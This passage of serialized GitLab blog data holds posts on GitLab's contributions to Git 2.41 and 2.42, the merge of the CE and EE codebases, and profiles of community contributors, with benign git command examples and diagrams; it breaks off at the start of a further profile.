pass a big\nnumber of references or paths as arguments to the\ncommand. References and paths can be quite long though.\n\nTo avoid hitting platform limits related to command line length, long\nago, a `--stdin` mode was added that allowed users to pass revisions\nand paths through stdin, instead of as command line\narguments. However, when that was implemented, it was not considered\nnecessary to allow options or pseudo-options, like `--not`,\n`--glob=...`, or `--all` to be passed through stdin.\n\nThis appeared to be a problem for GitLab, as for computing sizes for\nforked repositories we needed some of the pseudo-options, and it would\nhave been intricate and possibly buggy to pass some of them and their\narguments as arguments on the command line while others were passed\nthrough stdin.\n\n### Allowing pseudo-options\nTo fix this issue, Patrick Steinhardt implemented a small patch series to\nallow pseudo-options through stdin.\n\nWith it, in Git 2.42, one can now pass pseudo-options, like `--not`,\n`--glob=...`, or `--all` through stdin when the `--stdin` mode is used.\n\nDetails of the patch series, including discussions, can be found\n[here](https://lore.kernel.org/git/cover.1686744685.git.ps@pks.im/).\n\n## 4. Code and test improvements\nWhile looking at some Git code, we are often tempted to modify nearby\ncode, either to change only its style when the code is ancient and it\nwould look better using Git's current code style, or to refactor it to\nmake it cleaner. This is why we sometimes send small patch series that\ndon't have a real GitLab related purpose.\n\nIn Git 2.42, examples of style code improvements we made are the\n[part1](https://lore.kernel.org/git/pull.1513.git.git.1684440205.gitgitgadget@gmail.com/)\nand\n[part2](https://lore.kernel.org/git/pull.1514.git.git.1684599239.gitgitgadget@gmail.com/)\ntest code modernization patches from John Cai.\n\nAnd [here](https://lore.kernel.org/git/cover.1684324059.git.ps@pks.im/) is\nan example of a refactoring to cleanup some code by Patrick Steinhardt.\n","product",[751,930,9,267],{"slug":1498,"featured":6,"template":689},"contributions-to-git-2-42-release","content:en-us:blog:contributions-to-git-2-42-release.yml","Contributions To Git 2 42 Release","en-us/blog/contributions-to-git-2-42-release.yml","en-us/blog/contributions-to-git-2-42-release",{"_path":1504,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1505,"content":1510,"config":1516,"_id":1518,"_type":14,"title":1519,"_source":16,"_file":1520,"_stem":1521,"_extension":19},"/en-us/blog/contributions-to-latest-git-release",{"title":1506,"description":1507,"ogTitle":1506,"ogDescription":1507,"noIndex":6,"ogImage":1487,"ogUrl":1508,"ogSiteName":673,"ogType":674,"canonicalUrls":1508,"schema":1509},"Git 2.41 release - Here are five of our contributions in detail","Find out how GitLab's Git team helped improve the latest version of Git.","https://about.gitlab.com/blog/contributions-to-latest-git-release","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git 2.41 release - Here are five of our contributions in detail\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"John Cai\"}],\n        \"datePublished\": \"2023-06-20\",\n      }",{"title":1506,"description":1507,"authors":1511,"heroImage":1487,"date":1513,"body":1514,"category":1119,"tags":1515},[1512],"John Cai","2023-06-20","\n[Git 2.41](https://gitlab.com/gitlab-org/git/-/raw/master/Documentation/RelNotes/2.41.0.txt)\nwas officially released on June 1, 2023, and included some improvements from GitLab's Git team. Git is the foundation of\nrepository data at GitLab. GitLab's Git team works on everything from new\nfeatures, performance improvements, documentation improvements, and growing the Git\ncommunity. Often our contributions to Git have a lot to do with the way we integrate Git into\nour services at GitLab. Here are some highlights from this latest Git release,\nand a window into how we use Git on the server side at GitLab.\n\n## 1. Machine-parseable fetch output\nWhen `git-fetch` is run, the output is a familiar for users of Git and looks\nsomething like this:\n\n```bash\n> git fetch\nremote: Enumerating objects: 296, done.\nremote: Counting objects: 100% (189/189), done.\nremote: Compressing objects: 100% (103/103), done.\nremote: Total 296 (delta 132), reused 84 (delta 84), pack-reused 107\nReceiving objects: 100% (296/296), 184.46 KiB | 11.53 MiB/s, done.\nResolving deltas: 100% (173/173), completed with 42 local objects.\nFrom https://gitlab.com/gitlab-org/gitaly\n   cfd146b4d..a69cf20ce  master                                                                             -> origin/master\n   3a877b8f3..854f25045  15-11-stable                                                                       -> origin/15-11-stable\n * [new branch]          5316-check-metrics-and-decide-if-need-to-context-cancel-the-running-git-process-in -> origin/5316-check-metrics-and-decide-if-need-to-context-cancel-the-running-git-process-in\n + bdd3c05a2...0bcf6f9d4 blanet_default_branch_opt                                                          -> origin/blanet_default_branch_opt  (forced update)\n * [new branch]          jt-object-pool-disconnect-refactor                                                 -> origin/jt-object-pool-disconnect-refactor\n + f2447981c...34e06e106 jt-replicate-repository-alternates                                                 -> origin/jt-replicate-repository-alternates  (forced update)\n * [new branch]          kn-logrus-update                                                                   -> origin/kn-logrus-update\n + 05cea76f3...258543674 kn-smarthttp-docs                                                                  -> origin/kn-smarthttp-docs  (forced update)\n * [new branch]          pks-git-pseudorevision-validation                                                  -> origin/pks-git-pseudorevision-validation\n + 2e8d0ccd5...bf4ed8a52 pks-storage-repository                                                             -> origin/pks-storage-repository  (forced update)\n * [new branch]          qmnguyen0711/expose-another-port-for-pack-rpcs                                     -> origin/qmnguyen0711/expose-another-port-for-pack-rpcs\n + 82473046f...8e23e474c use_head_reference\n```\n\nThe problem with this output is that it's not meant for machines to parse.\n\nBut why would it be useful to make this output parseable by machines? To understand\nthis, we need to back up a little bit and talk about Gitaly Cluster. [Gitaly Cluster](https://docs.gitlab.com/ee/administration/gitaly/#gitaly-cluster)\nis a service at GitLab that provides high availability of Git repositories by\nreplicating repository writes to replica nodes. Each time a write comes in which\nchanges a Git repository (for example, a push that updates a reference) the write goes to\nthe primary node, and to all replica nodes before the write can succeed. A\nvoting mechanism takes place where the nodes vote on what its updated\nvalue for the reference would be. This vote succeeds when a quorum of replica\nnodes have successfully written the ref, and the write succeeds.\n\nOne of our remote procedure calls (RPCs) in Gitaly runs `git-fetch(1)` for repository mirroring. By\ndefault, when `git-fetch(1)` is run, it will update any references that are able\nto be fast-forwarded and fail on any reference that has since diverged will not\nbe updated.\n\nAs mentioned above, whenever there is an operation that modifies a repository, there\nis a voting mechanism that ensures the same modification is made to all replica nodes.\nTo dive in even a little deeper, our voting mechanism leverages Git's reference transaction hook,\nwhich runs an executable once per reference transaction. `git-fetch(1)` by default will\nstart a reference transaction per reference it updates. A fetch that updates hundreds or\neven thousand of references would thus vote once per reference that gets updated.\n\nIn the following sequence diagram, we are only showing one Gitaly node, but for a Gitaly Cluster\nwith, let's say, three nodes, what happens with the Gitaly primary also happens in\nthe replicas.\n\n```mermaid\nsequenceDiagram\n    participant user\n    participant GitlabUI as Gitlab UI\n    participant p as Praefect\n    participant g0 as Gitaly (primary)\n    participant git as Git\n    user->>GitlabUI: mirror my repository\n    GitlabUI->>p: FetchRemote\n    activate p\n    p->>g0: FetchRemote\n    activate g0\n    g0->>git: fetch-remote\n    activate git\n    git->>g0: vote on refs/heads/branch1 update\n    g0->>p: vote on refs/heads/branch1 update\n    git->>g0: vote on refs/heads/branch2 update\n    g0->>p: vote on refs/heads/branch2 update\n    git->>g0: vote on refs/heads/branch3 update\n    g0->>p: vote on refs/heads/branch3 update\n    deactivate git\n    note over p: vote succeeds\n    p->>GitlabUI: success\n    deactivate g0\n    deactivate p\n\n```\n\nThis is inefficient. Ideally we would want to vote once per batch of references\nupdated from one `git-fetch(1)` call. There is an option `--atomic` in\n`git-fetch(1)` that will open one reference transaction for all references\nupdated by `git-fetch(1)`. However, when `--atomic` is used, a `git-fetch` call will fail if any references have since diverged. This is not how we want repository mirroring to work. We actually want `git-fetch` to update whichever refs it can.\n\nSo, that means we cannot use the `--atomic` flag and are thus stuck voting per reference we update.\n\n### Solution: Handle the reference update ourselves\nThe way we are solving this inefficiency is to handle the reference update\nourselves. Instead of relying on `git-fetch(1)` to both fetch the objects and\nupdate all the references, we can use the `--dry-run` option of `git-fetch(1)`\nto first fetch the objects into a quarantine directory. Then if we can know\nwhich references *would* be updated, we can start a reference transaction\nourselves with `git-update-ref(1)` and update all the refs in one transaction,\nhence triggering a single vote only.\n\n```mermaid\n\nsequenceDiagram\n    participant user\n    participant Gitlab UI\n    participant p as Praefect\n    participant g0 as Gitaly (primary)\n    participant git as Git\n    user->>Gitlab UI: mirror my repository\n    Gitlab UI->>p: FetchRemote\n    activate p\n    p->>g0: FetchRemote\n    g0->>git: fetch-remote --dry-run --porcelain\n    activate git\n    note over git: objects are fetched into a quarantine directory\n    git->>g0: branch1, branch2, branch3 will be updated\n    deactivate git\n    g0->>git: update-ref\n    activate git\n    note over git: update branch1, branch2, branch3 in a single transaction\n    git->>g0: reference transaction hook\n    deactivate git\n    g0->>p: vote on ref updates\n    note over p: vote succeeds\n    p->>Gitlab UI: success\n    deactivate p\n\n```\n\nA requirement for this however, is that we would be able to parse the output of\n`git-fetch(1)` to tell which refs will be updated and to what values. Currently\nin `--dry-run`, `git-fetch(1)`'s output cannot be parsed by a machine.\n\n[Patrick Steinhardt](https://gitlab.com/pks-gitlab), Staff Backend Engineer, Gitaly, added a  `--porcelain` [option to git-fetch](https://git-scm.com/docs/git-fetch#Documentation/git-fetch.txt---porcelain)\nthat causes `git-fetch(1)` to gives its output in a machine-parseable format.\n\n```\n> git fetch --porcelain --dry-run --quiet\n* cd7ec0e2505463855d04f0a685d53af604079bdf 023a4cca58ac713090df15015a2efeadc73be522 refs/remotes/origin/master\n* 0000000000000000000000000000000000000000 b4a007671bd331f1c6f5857aa9a6ab95d500b412 refs/remotes/origin/alejguer-improve-readabiliy-geo\n  2314938437eb962dadd6a88f45d463f8ed2c7cec 3d3e36fa40e9b87b90ef31f80c63c767d0ef3638 refs/remotes/origin/ali/document-keyless-container-signing\n+ c8107330f8d5a938f6349743310db030ca5159e6 e155670196e4974659304c79e670b238192bce08 refs/remotes/origin/fc-add-failed-jobs-in-mr-part-2\n+ 9ec873de405b3c5078ad1c073711a222e7734337 eb7947e37d05460a94c988bf1f408f96228dd50d refs/remotes/origin/fc-mvc-details-page\n* 0000000000000000000000000000000000000000 36d214774f39d3c3d0569df8befd2b46d22ea94b refs/remotes/origin/group-runner-docs\n+ b357bfdec53b96e76582ac5dd64deb2d35dbe697 7b85d775b1a46ea94e0b241aa0b6aa37ae2e0b69 refs/remotes/origin/jwanjohi-add-abuse-training-data-table\n+ c9beb0b9c0b933903c12393acaa2c4447bb9035f fd13eda262c67a48495a0695659fea10b32e7e02 refs/remotes/origin/jy-permissions-blueprint\n+ 9ecf5a7fb7ca39a6a4296e569af0ddff1058a830 3341369e650c931c46d9880f3b781dc1e21c9f75 refs/remotes/origin/kassio/spike-pages-review-apps\n```\n\nThis change allows us to be much more efficient when mirroring repositories.\n\nDetails of the patch series, including discussions can be found [here](https://lore.kernel.org/git/cover.1683721293.git.ps@pks.im/).\n\n## 2. A new way to read Git attribute files\n[Git attribute](https://docs.gitlab.com/ee/user/project/git_attributes.html) is\na way to define attributes in a Git repository such as syntax highlighting. Until now, Git only read `.gitattribute` files in the wokrtree or the\n`.git/info/attributes` files. On Gitaly servers, we store repositories on disk\nas [bare\nrepositories](https://git-scm.com/docs/git-clone#Documentation/git-clone.txt---bare).\nThis means that on the server we don't keep worktrees around. To\nsupport gitattributes on GitLab then, we use a workaround whereby when the user\nchanges attributes on the default branch, we copy the contents of the blob\n`HEAD:.gitattribute` to the `info/attributes` file.\n\n\u003Cpre class=\"mermaid\">\nflowchart TD\n  A[User A] -->|edit HEAD:.gitattributes\u003Cbr/>git push| B[Gitaly]\n  B --> |copy HEAD:.gitattributes\u003Cbr/>to info/attributes| C[info/attributes file]\n  D[GitLab UI] --> |Display code with syntax highlighting| B\n  B -.->|how should I do syntax highlighting?\u003Cbr/>Read info/attributes file| C   \n\u003C/pre>\n\n### Solution: New git option to read attribute files directly\nTo get rid of this extra step of copying a blob to `info/attributes`,\nI added a new git\n[option](https://git-scm.com/docs/git#Documentation/git.txt---attr-sourcelttree-ishgt)\n`--attr-source=\u003Ctree>` whereby a caller can pass in a tree from which Git will\nread the attributes file directly. This way Git can read the attributes blob directly\nwithout a worktree and without having to copy the contents to `info/attributes` each time it changes.\n\n\u003Cpre class=\"mermaid\">\nflowchart TD\n    A[User A] -->|edit HEAD:.gitattributes\u003Cbr/>git push| B[Gitaly]\n    D[GitLab UI] --> |Display code with syntax highlighting|B\n    B --> |Directly read the HEAD:.gitattributes blob|B\n\u003C/pre>\n\nHaving this feature in Git allows us to simplify this process a lot. We no longer\nhave to manually copy over the contents to a separate file. Internally, this\nallows us to delete two RPCs, reducing complexity and improving performance.\n\nDetails of this patch series, including discussions can be found [here](https://lore.kernel.org/git/pull.1470.v6.git.git.1683346530487.gitgitgadget@gmail.com/).\n\n## 3. Bug fix in commit-graph generation numbers\nA regression for truncated commit-graph generation numbers is a bug that we have been hitting for\nspecific repositories, corrupting the commit-graph. The [commit\ngraph](https://git-scm.com/docs/commit-graph) is an important Git optimization\nthat speeds up commit graph walks. Commit graph walks happen whenever Git has to\nwalk through commit history. Any time we display commit history in the UI, for\ninstance, it  will trigger a commit graph walk. Keeping these fast is crucial to a\nsnappy browsing experience.\n\n### Solution: A patch series to fix the bug\nPatrick submitted a patch series to fix the regression for truncated commit-graph generation numbers bug \nDetails of this patch series, including discussions can be found [here](https://lore.kernel.org/git/f8a0a869e8b0882f05cac49d78f49ba3553d3c44.1679904401.git.ps@pks.im/).\n\n## 4. Fix for stale lockfiles in `git-receive-pack`\n`git-receive-pack(1)` is a Git command that handles the server-side of pushes. When `git push` is run\nagainst a GitLab server, Gitaly will handle the `ssh` or `http` request and\nspawn a `git-receive-pack(1)` process behind the scenes to handle the push.\n\n`git-receive-pack(1)` will write a lockfile when processing packfiles in order\nto prevent a race condition where a concurrent garbage-collecting process tries\nto delete the new packfile that is not yet being referenced by anything.\n\nWhen the `git-receive-pack(1)` process dies prematurely for whatever reason, this\nlockfile was being left around instead of being cleaned up. Busy repositories\nthat received many pushes a day could grow in size quickly due to the\naccumulation of these lockfiles.\n\n### Solution: A patch series to clean up unused lockfiles\nPatrick fixed this by submitting a patch series that allows `git-receive-pack(1)` to clean up its unused lockfiles. This allows GitLab to save space on its servers from having to keep useless lockfiles around.\n\nDetails of this patch series, including discussions can be found [here](https://lore.kernel.org/git/e1ee1d8026a361bc58d16bc741e2b347ada7a53e.1678431076.git.ps@pks.im/).\n\n## 5. Fixed geometric repacking with alternate object databases\n[Geometric repacking](https://git-scm.com/docs/git-repack#Documentation/git-repack.txt---geometricltfactorgt)\nis a repacking strategy where instead of packing everything into on giant pack\neach time, several packs are kept around according to a geometric progression\nbased on object size.\n\nThis is useful for large and very busy repositories so that housekeeping doesn't\nhave to pack all of its objects into a giant pack each time.\n\nUnfortunately, geometric repacking had various corner case bugs when an\nalternate object database was involved. At GitLab, we leverage the Git\nalternates mechanism to save space in the case of forks. A fork of a repository\nshares most files. Instead of keeping a second copy of all the data, when we\ncreate a fork, we can deduplicate this data by having both the source\nrepository, as well as the fork repository share objects by pointing to a third\nrepository. This means that only one copy of a blob needs to be kept around\nrather than two.\n\nGeometric repacking bugs prevented it from working in an object database that\nwas connected to an alternate object database.\n\n### Solution: A patch series\nThese bugs have been fixed via a patch series from Patrick. This\nhelps us as we improve our implementation of object pools in Gitaly.\n\nDetails of this patch series, including discussions can be found [here](https://lore.kernel.org/git/cover.1681452028.git.ps@pks.im/).\n",[751,930,9,267],{"slug":1517,"featured":6,"template":689},"contributions-to-latest-git-release","content:en-us:blog:contributions-to-latest-git-release.yml","Contributions To Latest Git Release","en-us/blog/contributions-to-latest-git-release.yml","en-us/blog/contributions-to-latest-git-release",{"_path":1523,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1524,"content":1529,"config":1534,"_id":1536,"_type":14,"title":1537,"_source":16,"_file":1538,"_stem":1539,"_extension":19},"/en-us/blog/contributor-after-single-code-base",{"title":1525,"description":1526,"ogTitle":1525,"ogDescription":1526,"noIndex":6,"ogImage":1348,"ogUrl":1527,"ogSiteName":673,"ogType":674,"canonicalUrls":1527,"schema":1528},"Contributing to GitLab after move to a single codebase","How contributors can benefit from the move to a single codebase for GitLab Community and Enterprise Editions.","https://about.gitlab.com/blog/contributor-after-single-code-base","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Contributing to GitLab after move to a single codebase\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-10-02\",\n      }",{"title":1525,"description":1526,"authors":1530,"heroImage":1348,"date":1531,"body":1532,"category":951,"tags":1533},[704],"2019-10-02","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nBy now, many readers will already be familair with GitLab's move to a single Rails codebase for GitLab Community(CE) and Enterprise(EE) Editions. The motivation for the change and work involved were well documented in blog posts by [Marin Jankovski](/blog/merging-ce-and-ee-codebases/) and [Yorick Peterse](/blog/a-single-codebase-for-gitlab-community-and-enterprise-edition/). Also, if you had an open merge request (MR) in CE, you probably saw messages from the GitLab bot (`@gitlab-bot`) like the one below. \n\n![GitLab bot message](https://about.gitlab.com/images/blogimages/Bot-closing-GitLab-FOSS-MR.png){: .shadow.medium.center} \n## Only impacts contributions to the new GitLab repository\n\nI want to highlight a couple of things with this move to a single codebase. First, if you are contributing to other GitLab projects such as [Charts](https://gitlab.com/gitlab-org/charts/gitlab), [GitLab Design System](https://gitlab.com/gitlab-org/gitlab-services/design.gitlab.com), [GitLab UI](https://gitlab.com/gitlab-org/gitlab-ui), [Omnibus](https://gitlab.com/gitlab-org/omnibus-gitlab), [Runner](https://gitlab.com/gitlab-org/gitlab-runner), etc., this move to a single Rails codebase for CE & EE will not have any impact on your contribution workflow. \n## Licenses remain the same\n\nNext, there is no change to licensing. GitLab CE will remain open source under the MIT license. GitLab EE code will reside in the [`ee` directory](https://gitlab.com/gitlab-org/gitlab/tree/master/ee) in the [new gitlab (formerly gitlab-ee) project](https://gitlab.com/gitlab-org/gitlab) and will remain source available under a proprietary license.  \n## Higher efficiency and easier to contribute\n\nWith this move to a single codebase, there will be less duplicate work and manual intervention required from GitLab team members in the future. This gives them more bandwidth for higher value activities, including helping with wider community contributions.\n\nThe single codebase should also simplify things for wider community members, as you can now search [for issues in one place](https://gitlab.com/gitlab-org/gitlab/issues), and there's also [one place for MRs](https://gitlab.com/gitlab-org/gitlab/merge_requests).\n\nAs another example for improvement, in the past, contributors occasionally had to deal with `ee_compat_check` errors when they submitted an MR in CE. This required opening an MR in EE (or asking a GitLab team member to open an EE MR) and then wait for it to be merged before continuing with the CE MR. This was a pain point for many contributors, and I am excited that this will be eliminated with the single codebase. \n## Re-submitting MRs against the new GitLab project\n\nIf you have an MR that was auto-closed by the GitLab bot in CE (now [GitLab FOSS](https://gitlab.com/gitlab-org/gitlab-foss)), you can continue your work by creating a new MR in the [new gitlab project](https://gitlab.com/gitlab-org/gitlab) following the steps outlined in the GitLab bot message above. If you have any questions or encounter issues when you open a new MR, please feel free to [mention](https://docs.gitlab.com/ee/user/group/subgroups/#mentioning-subgroups) the reviewers from your original MR or me and ask for help.  \n\nDuring and after the transition, I was happy to see MR's continuing to come in from the wider community so it doesn't look like this was a major disruption. However, if you have any questions or feedback you are welcome to [open an issue in gitlab](https://gitlab.com/gitlab-org/gitlab/issues) or reach out to me at `rpaik@gitlab.com`.\n\n[\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}",[267,779,9],{"slug":1535,"featured":6,"template":689},"contributor-after-single-code-base","content:en-us:blog:contributor-after-single-code-base.yml","Contributor After Single Code Base","en-us/blog/contributor-after-single-code-base.yml","en-us/blog/contributor-after-single-code-base",{"_path":1541,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1542,"content":1547,"config":1552,"_id":1554,"_type":14,"title":1555,"_source":16,"_file":1556,"_stem":1557,"_extension":19},"/en-us/blog/contributor-post-hannes",{"title":1543,"description":1544,"ogTitle":1543,"ogDescription":1544,"noIndex":6,"ogImage":1192,"ogUrl":1545,"ogSiteName":673,"ogType":674,"canonicalUrls":1545,"schema":1546},"GitLab Code Contributor: Hannes Rosenögger","Core team member Hannes Rosenögger shares his experience contributing to GitLab since 2014.","https://about.gitlab.com/blog/contributor-post-hannes","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Hannes Rosenögger\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-11-20\",\n      }",{"title":1543,"description":1544,"authors":1548,"heroImage":1192,"date":1549,"body":1550,"category":10,"tags":1551},[704],"2018-11-20","\nFor this month's blog post, we're featuring another [Core Team](/community/core-team/) member [Hannes Rosenögger](https://gitlab.com/haynes).\n\n### When did you first contribute to GitLab?\n\nMy first [MR to close multiple issues with one commit](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/263) was back in December 2014. So that's almost four years ago!\n\n### Why and how did you decide to contribute to GitLab?\n\n I used the Community Edition privately and noticed that mentioning multiple issues in an MR only closed the first issue. Since GitLab was open source and the fix was easy, I decided to fix it myself. GitLab's open policy about everything within the company was also a huge factor.\n\n### Which area(s) of the GitLab product have you been contributing to?\n\nI guess it's been pretty random for me. Most of my contributions have been on the backend side and documentation fixes, but if I see something that I can easily fix or I need a feature for my work, I try to make a contribution. I also provide support on the #gitlab IRC channel on freenode. My IRC handle is `haynes`.\n\n### Can you tell us what you do professionally?\n\nI am a Java software developer for a public sector organization in Germany.\n\n### What do you like to do when you're not working?\n\nWhen I'm not working, I'm probably doing something for my local scout group. I enjoy working with the kids and teaching. I also like to fix things from coffee machines to cars. Basically anything that I can fix with a bit of work.\n\n\u003C!-- carousel -->\n\n\u003Cdiv id=\"carousel-example-generic-5\" class=\"carousel slide medium center\" data-ride=\"carousel\" data-interval=\"10000\">\n  \u003C!-- Indicators -->\n  \u003Col class=\"carousel-indicators\">\n    \u003Cli data-target=\"#carousel-example-generic-5\" data-slide-to=\"0\" class=\"active\">\u003C/li>\n    \u003Cli data-target=\"#carousel-example-generic-5\" data-slide-to=\"1\">\u003C/li>\n    \u003Cli data-target=\"#carousel-example-generic-5\" data-slide-to=\"2\">\u003C/li>\n  \u003C/ol>\n\n  \u003C!-- Wrapper for slides -->\n  \u003Cdiv class=\"carousel-inner\" role=\"listbox\">\n    \u003Cdiv class=\"item active\">\n          \u003Cimg src=\"/images/blogimages/Hannes-blogpost/workbench.jpg\" alt=\"Hannes on workbench\">\n    \u003C/div>\n    \u003Cdiv class=\"item\">\n      \u003Cimg src=\"/images/blogimages/Hannes-blogpost/dishwasher.jpg\" alt=\"Hannes working on his dishwasher\">\n    \u003C/div>\n    \u003Cdiv class=\"item\">\n      \u003Cimg src=\"/images/blogimages/Hannes-blogpost/washing_machine.jpg\" alt=\"Washing machine repair\">\n    \u003C/div>\n\n  \u003C/div>\n\n  \u003C!-- Controls -->\n  \u003Ca class=\"left carousel-control\" href=\"#carousel-example-generic-5\" role=\"button\" data-slide=\"prev\">\n    \u003Csvg class=\"glyphicon glyphicon-chevron-left\" width=\"11\" height=\"19\" viewBox=\"0 0 11 19\" xmlns=\"http://www.w3.org/2000/svg\">\u003Cpath d=\"M.44 10.13l8.345 8.345 2.007-2.007-6.814-6.814 6.814-6.815L8.785.832.44 9.177a.652.652 0 0 0-.202.477c0 .183.067.343.202.477z\" fill-rule=\"evenodd\"/>\u003C/svg>\n    \u003Cspan class=\"sr-only\">Previous\u003C/span>\n  \u003C/a>\n  \u003Ca class=\"right carousel-control\" href=\"#carousel-example-generic-5\" role=\"button\" data-slide=\"next\">\n    \u003Csvg class=\"glyphicon glyphicon-chevron-right\" width=\"11\" height=\"19\" viewBox=\"0 0 11 19\" xmlns=\"http://www.w3.org/2000/svg\">\u003Cpath d=\"M10.59 10.13l-8.344 8.345L.24 16.468l6.814-6.814L.24 2.839 2.246.832l8.345 8.345a.652.652 0 0 1 .201.477.652.652 0 0 1-.201.477z\" fill-rule=\"evenodd\"/>\u003C/svg>\n    \u003Cspan class=\"sr-only\">Next\u003C/span>\n  \u003C/a>\n\u003C/div>\n\n### What advice do you have for others who may be interested in contributing to GitLab?\n\nContributing to GitLab is easier than it looks at a first glance and you can contribute to the community in many different ways. For example, if you want to help out translating the GitLab user interface to your native language on [CrowdIn](https://translate.gitlab.com/), this does not require programming skills or any special setup on your laptop. Also when you want to contribute code, reviewers are normally quite fast in getting back to you and are more than happy to help if you have any questions.\n\nIf you are unsure how to get started or you need help, anyone should feel free to ping me on Twitter ([@hrosenoegger](https://twitter.com/hrosenoegger)) or in the #gitlab IRC channel on [freenode](http://freenode.net/).\n\n### Anything else you want to share with the community?\n\nI love the fact that GitLab actually listens to the community. Even after they make a decision to add a new, paid feature, when community members believe it makes more sense to have the feature in [GitLab Core](/pricing/#self-managed) or the free tier of [GitLab.com](/pricing/), they will actually port it back. The [Squash and Merge feature](/releases/2018/06/22/gitlab-11-0-released/#squash-and-merge-in-gitlab-core-and-gitlabcom-free) is a good example of that.\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":1553,"featured":6,"template":689},"contributor-post-hannes","content:en-us:blog:contributor-post-hannes.yml","Contributor Post Hannes","en-us/blog/contributor-post-hannes.yml","en-us/blog/contributor-post-hannes",{"_path":1559,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1560,"content":1565,"config":1570,"_id":1572,"_type":14,"title":1573,"_source":16,"_file":1574,"_stem":1575,"_extension":19},"/en-us/blog/contributor-post-jacopo",{"title":1561,"description":1562,"ogTitle":1561,"ogDescription":1562,"noIndex":6,"ogImage":1192,"ogUrl":1563,"ogSiteName":673,"ogType":674,"canonicalUrls":1563,"schema":1564},"GitLab Code Contributor: Jacopo Beschi","Core Team member Jacopo Beschi shares why he loves contributing to GitLab.","https://about.gitlab.com/blog/contributor-post-jacopo","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Jacopo Beschi\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-09-06\",\n      }",{"title":1561,"description":1562,"authors":1566,"heroImage":1192,"date":1567,"body":1568,"category":10,"tags":1569},[704],"2018-09-06","\n\nThis is the second blog post [highlighting GitLab community members](/blog/contributor-post-vitaliy/)\nwho are making code contributions to GitLab. This month, we're featuring Jacopo\nBeschi, who is based in Italy and is also a member of the [Core Team](/community/core-team/).\n\n### How long have you been contributing to GitLab?\n\nI've been contributing since late 2016.\n\n### Why and how did you decide to contribute to GitLab?\n\nI was looking for an interesting open source software application mostly written\nin Ruby to contribute to. After some Googling around, I found GitLab and instantly\nfell in love with the application and this community.\n\n### Which areas of the GitLab product do you contribute to?\n\nI've contributed to multiple areas of GitLab, such as [backend](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/18757),\n[frontend](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/9890),\n[API](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/16478),\n[Utility](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/11579),\nand [Quality](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/15188)\nwhich are written in Rails.\n\nI haven’t had a chance to contribute to the Golang part of GitLab, such as\n[GitLab Runner](https://docs.gitlab.com/runner/), [Gitaly](https://docs.gitlab.com/ee/administration/gitaly/),\nor [GitLab Workhorse](https://gitlab.com/gitlab-org/gitlab-workhorse).\n\n### Can you tell us what you do professionally?\n\nCurrently, I work as technical lead for [Iubenda](http://www.iubenda.com), a SaaS\nprovider focused on privacy and cookie policies.\n\n### What do you like to do when you're not working?\n\nWhen I’m not working, I enjoy training in the gym and spending time with my wife and friends.\n\n### What advice do you have for others who may be interested in contributing to GitLab?\n\nDon’t be nervous about getting started! This [Contributing to GitLab page](/community/contribute/)\nexplains all the steps you need to take in order to be a successful contributor,\nand I encourage people to start there.\n\nGitLab also has a lot of [online documentation](https://docs.gitlab.com/) that\nyou could search in order to solve most common questions that developers have.\n\n### Do you have anything else you’d like to share?\n\nContributing to GitLab not only enhances your resume but also allows you to get\nin touch with great people who can help you improve your technical knowledge.\nIn addition, your contribution to GitLab will affect the lives of thousands of\ndevelopers around the globe!\n\n## Interested in learning how you can contribute?\n\nAs Jacopo already suggested, a good place to start is the\n[Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":1571,"featured":6,"template":689},"contributor-post-jacopo","content:en-us:blog:contributor-post-jacopo.yml","Contributor Post Jacopo","en-us/blog/contributor-post-jacopo.yml","en-us/blog/contributor-post-jacopo",{"_path":1577,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1578,"content":1583,"config":1588,"_id":1590,"_type":14,"title":1591,"_source":16,"_file":1592,"_stem":1593,"_extension":19},"/en-us/blog/contributor-post-luke",{"title":1579,"description":1580,"ogTitle":1579,"ogDescription":1580,"noIndex":6,"ogImage":1192,"ogUrl":1581,"ogSiteName":673,"ogType":674,"canonicalUrls":1581,"schema":1582},"GitLab Code Contributor: Luke Picciau","New contributor Luke Picciau shares why he started contributing to GitLab.","https://about.gitlab.com/blog/contributor-post-luke","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Luke Picciau\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-10-04\",\n      